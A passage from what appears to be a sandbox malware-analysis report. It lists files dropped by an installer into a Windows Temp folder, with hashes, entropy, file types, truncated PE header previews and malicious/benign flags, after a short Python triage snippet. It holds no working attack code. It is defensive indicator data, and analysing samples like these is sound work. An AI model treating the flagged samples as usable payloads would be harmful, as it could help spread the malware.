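                             1700000000)
    for key, value in triage(sample).items():
        print(f"{key}:{value}")
```

Run the same `triage` over a recovered dropped file and compare its digests and File Type string with the entry above; the entropy of a real DLL lands in the 5.9 to 6.7 range seen here, while values near 8.0 point at packed or encrypted content. The link timestamp is the COFF `TimeDateStamp`, which a builder can set to anything, so a date in the future or far in the past is worth noting rather than trusting.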
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):13472
Entropy (8bit):6.292043114894753
Encrypted:false
SSDEEP:192:WrB5jnA6+FpGKCRXEWfWlrWngbXH9YOCAs/nGfe4pBjSjM:WrnjnA6+MXEWfWlrIgbCA0GftpBj9
MD5:8C454E6D06D56C19F355F702B15EBB15
SHA1:6D4322B7BC25A50E0C5EFC80DD71824592D3A040
                                                                                                                                                                                                                                        SHA-256:3A1475D6F1A99AB2A85AFEDFF3DB6454D901EBF1DE1D58E294EA2CB16516648A
                                                                                                                                                                                                                                        SHA-512:6D1C221430668BE2C7DAAE9D27AAA621038F8F52F5AC3CF9A6D02D10F33E85718E08017E5CF6CDB9E2CB10CE66EB9212DCC6C88FB17C4FB486C7D71720B6BDFB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...//.U...........!..................... ...@....... ..............................`v....@.................................4...W....@.......................`.......,............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p.......H........ ..,...................P ......................................0..L....7.^...........w. ..E&."...v.hi.l..Y....3..%?...G...7.C.Y|.k.8..vb.kq..P.qw..F.(.5."..i.,1.i9....\t.)...gr..7BSJB............v4.0.30319......l...p...#~..........#Strings............#US.........#GUID.......`...#Blob...........GW........%3........................................................................l.e...............'.e...<.e...d.J.......................................7.....P.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7008240
                                                                                                                                                                                                                                        Entropy (8bit):6.674290383197779
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:9VPhJZWVvpg+za3cFlc61j2VjBW77I4iNlmLPycNRncuUx24LLsXZFC6FOCfDt2/:BJZzI1ZR3U9Cxc22aDACInVc4Z
                                                                                                                                                                                                                                        MD5:47307A1E2E9987AB422F09771D590FF1
                                                                                                                                                                                                                                        SHA1:0DFC3A947E56C749A75F921F4A850A3DCBF04248
                                                                                                                                                                                                                                        SHA-256:5E7D2D41B8B92A880E83B8CC0CA173F5DA61218604186196787EE1600956BE1E
                                                                                                                                                                                                                                        SHA-512:21B1C133334C7CA7BBBE4F00A689C580FF80005749DA1AA453CCEB293F1AD99F459CA954F54E93B249D406AEA038AD3D44D667899B73014F884AFDBD9C461C14
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......QH^~.)0-.)0-.)0-.Q.-.)0-...-.)0-.F4,.)0-.F3,.)0-.F5,.)0-.F1,.)0-.Y1,.)0-.B5,.)0-.B1,.)0-.)1-m,0-.Y4,.)0-.Y5,|(0-.Y0,.)0-.Y.-.)0-.).-.)0-.Y2,.)0-Rich.)0-................PE..d....._.........." ......?...+.....X.?.......................................k.....R.k...`.........................................pKK.....d.e.|....`k.......g.......j......pk..6....F.T................... .F.(.....F.0.............?.p+...........................text...2.?.......?................. ..`.rdata...z&...?..|&...?.............@..@.data....o... f.......f.............@....pdata........g.......f.............@..@.rsrc........`k.......j.............@..@.reloc...6...pk..8....j.............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2620496
                                                                                                                                                                                                                                        Entropy (8bit):6.585920836421845
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:DkkOdZ7GfbhfKr3dSBmmvYphxOnWyVbgW7udHFBeWB61N/1oDRTrorVPTeB/CrCY:Dkm4SBmmgpPyVbgGN/1oNI5c/SRCbUUm
                                                                                                                                                                                                                                        MD5:39F452CDA9C88FB2D3BCD69E6187E803
                                                                                                                                                                                                                                        SHA1:9786EA3FC2C66240299279205CED1EDC803A002A
                                                                                                                                                                                                                                        SHA-256:212FB1753A42CFACDCD13FBAA62183AD4739C5AA720B1C49D8334DA37DA3B5D6
                                                                                                                                                                                                                                        SHA-512:4C5ED8F070423DE9C8EB034C3C1BBDA7EA225031A09D1BC234602C1DC46A702331036EFA92F764807347F8B9F92D0901D75A367F7FD388F160C7BAF57720CCD0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w..............n2......n$.t............n#.....D#.....=5.................._....n-."....n5......D3.......0......n6.....Rich............................PE..L...Z2 f...........!.....\...r......O........p............................... (.....he(...@..........................j .N...d[ .......".t.............'.P*...p&......s.................................@............p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data...T>...p ......\ .............@....rsrc...t....."......x".............@..@.reloc.. ....p&......0&.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):439
                                                                                                                                                                                                                                        Entropy (8bit):4.823425713064833
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:xr9UIm6eQNuuiqEUG1bkAddYMUEqRpXQu:t82NuVp1LzVypl
                                                                                                                                                                                                                                        MD5:2DB9E4993F5E2F0E57C329F9EAC3B990
                                                                                                                                                                                                                                        SHA1:E1BFA095969ED94A8C8CEBF15EB1C3CAB7654B47
                                                                                                                                                                                                                                        SHA-256:96BDBF6D9C20A2EE3249FBA5DAD3BF9BF7D14EAB3E3915EE75A11716BCB82F03
                                                                                                                                                                                                                                        SHA-512:9FBC870286643AFD636B37C3E4382F3DD2945E9C1D4F09EF7CDBA49B221D8F35D13C3228803469A7D929E81CF4751A78D934CA6A8A408A9A6B5A0D29E2A6CD99
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:module QtGraphicalEffects.private..plugin qtgraphicaleffectsprivate..classname QtGraphicalEffectsPlugin..FastGlow 1.0 FastGlow.qml..FastInnerShadow 1.0 FastInnerShadow.qml..FastMaskedBlur 1.0 FastMaskedBlur.qml..GaussianDirectionalBlur 1.0 GaussianDirectionalBlur.qml..GaussianGlow 1.0 GaussianGlow.qml..GaussianInnerShadow 1.0 GaussianInnerShadow.qml..GaussianMaskedBlur 1.0 GaussianMaskedBlur.qml..DropShadowBase 1.0 DropShadowBase.qml..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):293336
                                                                                                                                                                                                                                        Entropy (8bit):6.3387704733743675
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:e6w9S8XR5N3W5a46zG0WkGgcaWALhrkw/FKn0HH:RwM8h5Nm5aRi0bWALhrz9K0H
                                                                                                                                                                                                                                        MD5:3DF62B62984471E2DCD1C69EA5FDD182
                                                                                                                                                                                                                                        SHA1:8F28C3F78588B1F307882AD5512934A93E98322E
                                                                                                                                                                                                                                        SHA-256:07A5CEB6E6EFB996690AEDF18221F18644FCEAF94501722B10B75A139EA3899C
                                                                                                                                                                                                                                        SHA-512:434A19429E672A68D26A02E29388A09B1CAAA3051082DDC4E141AF3AC53FAEFAD05CF3245D9A015EC7A3BBB1B573CD822B1B10079568F48F350D69818E16AA21
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........`.5..zf..zf..zf.y.f..zf.t~g..zf.tyg..zf.t.g..zf.t{g..zf.~g..zf.{g..zf..{fN.zf.h.g..zf.tsg..zf.tzg..zf.t.f..zf...f..zf.txg..zfRich..zf........................PE..d...^.Vf.........." ....."...0.......................................................4....`.............................................x....................P...$...P...)......0......p...........................@...8............@...............................text...N!.......".................. ..`.rdata.."....@.......&..............@..@.data........@......................@....pdata...$...P...&... ..............@..@.rsrc................F..............@..@.reloc..0............L..............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1001280
                                                                                                                                                                                                                                        Entropy (8bit):5.973788439232148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:NWJjEJM48ZDBXci9fHQEKZm+jWodEEw9N2:NWJjd48rJw
                                                                                                                                                                                                                                        MD5:37DC8CC78ECBCD12F27E665B70BAEFA7
                                                                                                                                                                                                                                        SHA1:46FB9910CC10C4C0C52B547700E1950CE233BE89
                                                                                                                                                                                                                                        SHA-256:B53ADD5B7BD6BB11FECC7BE159885D0B75736D02423C11EDC6EEB6F4BEA80F6C
                                                                                                                                                                                                                                        SHA-512:078B0B408510C07EAC85518F03A9E3FAC8E4C8E2E36CCB8CD26962498C7F5BEDBD79F7034AF3EBFEF9984F85D81C9032446B1B5C156B2174A769657EA0AB60A1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ey.T..w...w...w......w.......w.:Fv...w...v...w.:Ft...w.:Fs.N.w.:Fr.J.w.:Fw...w.:F....w.:Fu...w.Rich..w.........PE..d.....W.........." .....j..........p........................................`.......d....`A.........................................@..........P....@.......p..\.......@?...P..........T...........................`........................<..@....................text...uh.......j.................. ..`.rdata..............n..............@..@.data....:...0......................@....pdata..\....p.......:..............@..@.didat..h....0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):58928
                                                                                                                                                                                                                                        Entropy (8bit):6.210845696900253
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:ZNVfaQtx0rrYIMhJygv8Vv8g+FB+iYB7E:nVCQt5Ibg47KB+tB7E
                                                                                                                                                                                                                                        MD5:9BB14D1464473D1F56AE1D24D6392E92
                                                                                                                                                                                                                                        SHA1:8B7AB1FB92B09D4AFC6F9D42E4D8AD5D1C8D0FD7
                                                                                                                                                                                                                                        SHA-256:BDDAB562C19FA28B2EF824ED6E18FF7D692B2196BC34FAE7895D9FAF51926C1A
                                                                                                                                                                                                                                        SHA-512:90029EBF849B2DA771DC7DCCBA392CD66E71CF77376F6279DD0864EFEBFC535E882CC63F0BC8EFE3B067AB3C6639BC70365915BBD8EA18EEB68BB22F866AC66D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........g.4.4.4U.|4.4`.5.4...5.4.4..4`.5.4`.5.4`.5...4`.5...4`.l4...4`.5...4Rich.4................PE..d....3.\.........." .....l...>.......n..............................................Zo....`A............................................\......P...............d.......0>..........p...T..............................................p............................text...wj.......l.................. ..`.rdata...".......$...p..............@..@.data...............................@....pdata..d...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):91024
Entropy (8bit):6.388398823218999
Encrypted:false
SSDEEP:1536:we9rhlZHAE3GKE0s7Z54x/wJFxOJP0zyZL52/xP48yS/WGneBK8jcljEF4/7FP:we9rrZVW7UP02ZL52/xKS/WGmK8Ql/xP
MD5:58E097F71CD3D820E56A57082F331F9B
SHA1:E0ADDC85992A7984C1989E0139E35113EF5077CF
SHA-256:D25311D8E66BDD0C66A048F390AC4801DDED8A4BEBD8C12683463BC093A16BFC
SHA-512:2545405EA52B1998031D05E5AC8E8F1699DC563D0E29CC858389F0DC65EB716FFD65EC756583EB990EFCA89249C344AA67BC2189EBFBFEBDB2251CFF6B4B0DC8
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):272024
Entropy (8bit):6.401523708321372
Encrypted:false
SSDEEP:3072:jtIyoyUR96mycNRJ+JD3KJjCcyKVBd3BG/8R2HRExeobW:jeykR96mycPJ8mVBxBJ2Hqxeob
MD5:0EFE3D3758D3BFBAAAC4083008F4ADEA
SHA1:3A2277853EFAD84466235B0C2D2A3A622F7449B0
SHA-256:0E19F6DE21D787067F49238FC75B620F876AEDF112A9365F4A0A38B66DF63EC4
SHA-512:466E0899D43F097069F2D8FA386F29E5091E6D1D49351385749A67F0D59D81227CB9F3C48B96CD8FA3682FB29BA6D65D8A9906E69E4A2F8F50DFEB56816CD6F6
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):330736
Entropy (8bit):6.381828869454302
Encrypted:false
SSDEEP:6144:6qLZcTC3wR/0JNZ+csBkBv0L0hq+SvcO8MsvwbIeblsjTR:6qNcCwqHE2fYlsPR
MD5:03761F923E52A7269A6E3A7452F6BE93
SHA1:2CE53C424336BCC8047E10FA79CE9BCE14059C50
SHA-256:7348CFC6444438B8845FB3F59381227325D40CA2187D463E82FC7B8E93E38DB5
SHA-512:DE0FF8EBFFC62AF279E239722E6EEDD0B46BC213E21D0A687572BFB92AE1A1E4219322233224CA8B7211FFEF52D26CB9FE171D175D2390E3B3E6710BBDA010CB
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):418696
Entropy (8bit):6.021730081658021
Encrypted:false
SSDEEP:6144:GIDKBfonoNFTFGQ1N421Ub9bNuAdlAzy/hA1h6H7BdCEtvrPJIs4u2bYIzK1I6hM:nnATFZ16bBdCEtvrPJIs4RbYIa
MD5:5F4D7D0FC695C2FBC9BEA18271BA6778
SHA1:F116880355A4A8936CDD1FE953FCF126833DB0D8
SHA-256:E0ABCA4F407DD17B77EADE645114CC700397D99EE86CD6BF46DE7D7C8D8BCECA
SHA-512:36B65443EED8FFF62ABB5AC2BA3C4641181F860EC93211F2F1363CCF3EDE5295C15D3021EB34DBF7A4AFCAFE56F087A3654036166455818367D6556622670956
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):375768
Entropy (8bit):6.40112684770505
Encrypted:false
SSDEEP:6144:OMcPPIlbJyh0zhqcDoDxaIGZp29pRzlky+dToha8DhKAKlj:6YlbJo0NTED5xxky+dTo+J
MD5:0F07D34838521637570E89E4006AEF43
SHA1:11806E1542D44921353B731D63CEAA36FB4DB908
SHA-256:5E8E5FCFF169B2C081F7B17865FFB31A0343CA67F0DCF18C6CA691E42E180EC9
SHA-512:242225C9EA191C5B4411CDA58B0ACF790137D33665A3E40E80EF258F71EB2A88435068FBBECC9483014BE9DD5EB7F488253F5173F3170EBE52F0833F93B5CEAB
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):858512
Entropy (8bit):6.6801261433761185
Encrypted:false
SSDEEP:24576:oKI9x2m++aGCiJez1mfrq06cJKGv1DS7BQLG9Dp:U5BpCiy1mfu0RJKcDS7BQCl
MD5:44823FB067EFDD3DC2F023B313AB263C
SHA1:184ED6F663E2F4C67411BF2BF6DBC4BE3387005D
SHA-256:225D432437DDF86B0F0685C424268ED65BFCBE1907CF4F1D7B1AE6A6CB575D80
SHA-512:4A53156F203E8364D491A3B39E55EE41474473CB3C9CD9A14CDF9A357E8A9EB9DADC859C985CA40E07DC379B9BFDCDA4C94CCFF313DF63B20DE4CEF383E9C2F8
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):2806
Entropy (8bit):3.9239610717683986
Encrypted:false
SSDEEP:48:MV3hrMZGYvAOPOrgkAVllg1NJa6PrjAXFZ6xOHZAFZ6xOHKjAFZArXzXhs+U+a8q:MnZoAOPOrgkA9g1NJa6PrjAVZakZGZaO
MD5:E9D04A488B2901DEB37AD99D77740857
SHA1:9AD315E085E55166267A78387DD98D5EA72E8BF6
SHA-256:A3A195DEB84E27D8A05324949C3D5905BEAA05BAD572D6A3C4A00A693155E4D5
SHA-512:4D33225331BDBAF3E9ACF7BF2D8A79BCD9E4276AB72E98307460262C9FBE0ADBFDBE22A786290111557C6A90EF6D19EC02FD2777F47B41E19755BE72BB6F88D7
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2704896
Entropy (8bit):5.925433873080991
Encrypted:false
SSDEEP:49152:IIj+xNMJhwcQ7+a5DypU6C1w4pIIt8pZ6e0g1CPwDv3uFfJsg:p+MRQ2pDCCHIt8p1CPwDv3uFfJ
MD5:A3F468A033C802C94DAA8E0BD9DC4C7A
SHA1:2041D719D63FA7455B15A8168B6C362B7D6F4EAB
                                                                                                                                                                                                                                        SHA-256:B1F985116F7C8BE9B022F35213CE1F48B2C640AB2DD0D080A80DBAA42437B25A
                                                                                                                                                                                                                                        SHA-512:1CE7AE7C29837347FD770C867F8AE6566AF76B68840B08A9F6F9C51026251689ED2FE66B00B3F4EE6F4D103DF0A4B02911ED50A905E60750631306B42E89BF65
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........f..............q+......q........$........./....q)......q..9....q,......q-......q*.....Rich............................PE..d...*.6`.........." ................T.........................................)...........@.........................................@s$..h... )......@).|....`'.............P).pN..P................................................()..............................text...V........................... ..`.rdata..[...........................@..@.data....u....&..*....&.............@....pdata.......`'.......&.............@..@.idata....... ).......(.............@....rsrc...|....@).......(.............@..@.reloc...o...P)..p....(.............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):644096
                                                                                                                                                                                                                                        Entropy (8bit):5.526662897266232
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:U4ROKzRoNmA5OR6tPMQaRmvj4tMO5/vuUta7GTDrPnkR8edJH:DmmA5OjjHuGzv68edJH
                                                                                                                                                                                                                                        MD5:C3725B33DC3D5AC2CC041E015DD275FC
                                                                                                                                                                                                                                        SHA1:74D72B51047F1474F943CFD99B88DD081C7170C4
                                                                                                                                                                                                                                        SHA-256:36AC1D72044CFACC4C1E85D380EE6BA0976D4D7AA23068F0B7F204214A942995
                                                                                                                                                                                                                                        SHA-512:DF25CC9F19A044449D70535BD8E5ED0B1C3BFD40E4E4904A7F495E8A06023CA695D28F81CD1D65F02EA86859C261F8DF502499BD0B06DB19F56B6299C329CFCC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............B..B..B..IB..B..DB..B..qB..B..FB..B..B1..B..pB..B..AB..B..@B..B..GB..BRich..B........................PE..d...X.6`.........." .........D.......v....................................... ............@..............................................N......P.......s....0..8O..............8...P...................................................0............................text.............................. ..`.rdata...'.......(..................@..@.data....K.......D..................@....pdata..PX...0...Z..................@..@.idata...Q.......R...^..............@....rsrc...s...........................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):134032
                                                                                                                                                                                                                                        Entropy (8bit):6.570489921495016
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:vp/izzvTlS0eRHWMlLCjL/QNQ5fYNAI/E3:BcTlSZBLCjL/QNPN56
                                                                                                                                                                                                                                        MD5:7C7F0913AB04A9AF8783D76DF338EDDA
                                                                                                                                                                                                                                        SHA1:4E526E15E05BB6B5A902217B31B8D6EF36CAEE96
                                                                                                                                                                                                                                        SHA-256:A9C28B91E4ED90D620F554ABE21B278310C451BB36A1A5B338C673BE7FE9C95C
                                                                                                                                                                                                                                        SHA-512:CA5C1E29D7381754814FE155CC3BF9347D07944CBDA3062B24571546252235434AE107033B8EF80A9791074146D4E3EE691EF06F5657EE52ABF8188B7B53E5BD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y59..TW..TW..TW.k.,..TW..,...TW..,...TW..TV.TW..,...TW.k.:..TW..,...TW..,..YTW.:.)..TW..,...TW..,...TW.Rich.TW.........................PE..d.....Z.........." .........0............................................... .......N....@.........................................@...x.......P......................../...........................................................................................text............................... ..`.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):566704
                                                                                                                                                                                                                                        Entropy (8bit):6.494428734965787
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:M/Wn7JnU0QUgqtLe1fqSKnqEXG6IOaaal7wC/QaDWxncycIW6zuyLQEKZm+jWodj:yN59IW6zuAQEKZm+jWodEEY1u
                                                                                                                                                                                                                                        MD5:6DA7F4530EDB350CF9D967D969CCECF8
                                                                                                                                                                                                                                        SHA1:3E2681EA91F60A7A9EF2407399D13C1CA6AA71E9
                                                                                                                                                                                                                                        SHA-256:9FEE6F36547D6F6EA7CA0338655555DBA6BB0F798BC60334D29B94D1547DA4DA
                                                                                                                                                                                                                                        SHA-512:1F77F900215A4966F7F4E5D23B4AAAD203136CB8561F4E36F03F13659FE1FF4B81CAA75FEF557C890E108F28F0484AD2BAA825559114C0DAA588CF1DE6C1AFAB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y...................Z.........O.....O.....O.....O.....O.....O.6....O.....Rich...........................PE..d...%|.a.........." .....<...\.......)...................................................`A.........................................5..h...(...,............p...9...~...'......0.......T...............................8............P...............................text....;.......<.................. ..`.rdata..j....P.......@..............@..@.data...`:...0......................@....pdata...9...p...:...6..............@..@.rsrc................p..............@..@.reloc..0............t..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):23944
                                                                                                                                                                                                                                        Entropy (8bit):5.991779991904571
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:fXt9apR9EFsN2iWcs5gWjcKLHRN7IVslGssA:fXK79EFsEHKAmS
                                                                                                                                                                                                                                        MD5:0832532FAB0D5C949AA0C65169AA9D61
                                                                                                                                                                                                                                        SHA1:26F1BEE679B7A6289B663C4FA4E65EBA33A234E8
                                                                                                                                                                                                                                        SHA-256:8731A93E519C2595C9FD489E6D9AC07E964448C0DA1C8EE9EE500A7989482617
                                                                                                                                                                                                                                        SHA-512:03147A59EE35FB3D2752D4C40741A39674CCD4474A575746BC574D2B2FAE1FD04F5AB9C2E02B0DC6268FC6AEE8FBB46DC4BF5FF23B5FCC4A0E9B847F57CA79D0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............h...h...h.......h.......h......h......h...h...h......h......h......h...g..h......h..Rich.h..........................PE..d...*|.a.........." .........$.......................................................Y....`A........................................P?..L....@..x....p.......`.......:...#......|...@3..T............................3..8............0..0............................text............................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`.......0..............@..@.rsrc........p.......4..............@..@.reloc..|............8..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1001280
                                                                                                                                                                                                                                        Entropy (8bit):5.973788439232148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:NWJjEJM48ZDBXci9fHQEKZm+jWodEEw9N2:NWJjd48rJw
                                                                                                                                                                                                                                        MD5:37DC8CC78ECBCD12F27E665B70BAEFA7
                                                                                                                                                                                                                                        SHA1:46FB9910CC10C4C0C52B547700E1950CE233BE89
                                                                                                                                                                                                                                        SHA-256:B53ADD5B7BD6BB11FECC7BE159885D0B75736D02423C11EDC6EEB6F4BEA80F6C
                                                                                                                                                                                                                                        SHA-512:078B0B408510C07EAC85518F03A9E3FAC8E4C8E2E36CCB8CD26962498C7F5BEDBD79F7034AF3EBFEF9984F85D81C9032446B1B5C156B2174A769657EA0AB60A1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ey.T..w...w...w......w.......w.:Fv...w...v...w.:Ft...w.:Fs.N.w.:Fr.J.w.:Fw...w.:F....w.:Fu...w.Rich..w.........PE..d.....W.........." .....j..........p........................................`.......d....`A.........................................@..........P....@.......p..\.......@?...P..........T...........................`........................<..@....................text...uh.......j.................. ..`.rdata..............n..............@..@.data....:...0......................@....pdata..\....p.......:..............@..@.didat..h....0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):439
                                                                                                                                                                                                                                        Entropy (8bit):4.823425713064833
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:xr9UIm6eQNuuiqEUG1bkAddYMUEqRpXQu:t82NuVp1LzVypl
                                                                                                                                                                                                                                        MD5:2DB9E4993F5E2F0E57C329F9EAC3B990
                                                                                                                                                                                                                                        SHA1:E1BFA095969ED94A8C8CEBF15EB1C3CAB7654B47
                                                                                                                                                                                                                                        SHA-256:96BDBF6D9C20A2EE3249FBA5DAD3BF9BF7D14EAB3E3915EE75A11716BCB82F03
